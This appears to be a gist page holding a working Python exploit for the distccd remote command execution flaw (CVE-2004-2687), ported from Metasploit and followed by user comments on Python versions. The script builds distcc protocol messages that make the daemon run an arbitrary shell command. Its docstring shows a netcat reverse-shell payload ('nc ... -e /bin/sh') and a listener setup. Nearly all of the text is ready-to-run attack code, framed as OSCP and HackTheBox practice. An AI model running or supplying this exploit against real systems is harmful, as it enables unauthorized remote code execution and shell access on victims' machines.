(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
```python
# -*- coding: utf-8 -*-
'''
    distccd v1 RCE (CVE-2004-2687)

    This exploit is ported from a public Metasploit exploit module:

    The goal of this script is to avoid using Metasploit and to do it manually (OSCP style).

    I'm aware an Nmap script exists, but for some reason I could not get it to work.

    Example, Lame box (HTB):

    local>nc -lvp 1403
    local>./ -t -p 3632 -c "nc 1403 -e /bin/sh"

    Enjoy your shell.

    Jean-Pierre LESUEUR
'''

import socket
import string
import random
import argparse


def rand_text_alphanumeric(length):
    '''Generate a random alphanumeric string (evade some signature-based detection?).'''
    text = ""
    for _ in range(length):
        text += random.choice(string.ascii_letters + string.digits)
    return text


def recv_exact(s, size):
    '''recv() may return fewer bytes than asked for; loop until size bytes are in hand.'''
    data = b""
    while len(data) < size:
        chunk = s.recv(size - len(data))
        if not chunk:
            raise socket.error("connection closed by remote service")
        data += chunk
    return data


def read_std(s):
    '''Read one SERR / SOUT chunk (STDERR / STDOUT) returned by the remote service.

    Every distcc token is 4 ASCII characters followed by an 8-digit hex length,
    then a payload of exactly that length.
    '''
    recv_exact(s, 4)  # Token name (SERR or SOUT), ignored
    size = int(recv_exact(s, 8), 16)  # Get output length
    if size != 0:
        return recv_exact(s, size)
    return None


def exploit(command, host, port):
    '''Trigger the exploit: distccd runs argv[0] ("sh") with the arguments we supply.

    The "#" turns the trailing "-c main.c -o main.o" into a shell comment, so the
    request still looks like a compile job while sh only executes our command.
    '''
    args = ["sh", "-c", command, "#", "-c", "main.c", "-o", "main.o"]

    payload = "DIST00000001" + "ARGC%.8x" % len(args)
    for arg in args:
        payload += "ARGV%.8x%s" % (len(arg), arg)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        if s.connect_ex((host, port)) == 0:
            print("[\033[32mOK\033[39m] Connected to remote service")
            try:
                s.send(payload.encode())

                # DOTI carries the "preprocessed source"; 0x0A = 10 random bytes
                dtag = "DOTI0000000A" + rand_text_alphanumeric(10)
                s.send(dtag.encode())

                recv_exact(s, 24)  # DONE00000001 + STATxxxxxxxx, ignored

                print("\n--- BEGIN BUFFER ---\n")
                buff = read_std(s)  # STDERR
                if buff:
                    print(buff.decode("utf-8", "replace"))
                buff = read_std(s)  # STDOUT
                if buff:
                    print(buff.decode("utf-8", "replace"))
                print("\n--- END BUFFER ---\n")

                print("[\033[32mOK\033[39m] Done.")
            except socket.timeout:
                print("[\033[31mKO\033[39m] Socket Timeout")
            except socket.error:
                print("[\033[31mKO\033[39m] Socket Error")
            except Exception:
                print("[\033[31mKO\033[39m] Exception Raised")
        else:
            print("[\033[31mKO\033[39m] Failed to connect to %s on port %d" % (host, port))
    finally:
        s.close()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='DistCC Daemon - Command Execution (Metasploit)')
    parser.add_argument('-t', action="store", dest="host", required=True, help="Target IP/HOST")
    parser.add_argument('-p', action="store", type=int, dest="port", default=3632, help="DistCCd listening port")
    parser.add_argument('-c', action="store", dest="command", default="id", help="Command to run on target system")
    try:
        argv = parser.parse_args()
        exploit(argv.command, argv.host, argv.port)
    except IOError as err:
        print("[\033[31mKO\033[39m] %s" % err)
```

Reelix commented Nov 2, 2020

Note that this script needs to be run using python2. If you attempt to run it with python3, it will connect to the service and simply fail.


DarkCoderSc commented Nov 2, 2020

This script was built for Python3 and it works on my side ;)


Chris-Lenz commented Nov 26, 2020

works for me in Python3 as well. Thank you


epicn1337 commented Feb 6, 2021

thanks for this script fam.


A1vinSmith commented Jul 27, 2021

Thank you, python2 for HTB Lame


saunders-jake commented Nov 1, 2021

This only works in Python2 for me.


DarkCoderSc commented Nov 17, 2021

I removed the #!/usr/bin/python for those that were confused.


epicn1337 commented Nov 18, 2021

yeah it's cool thanks
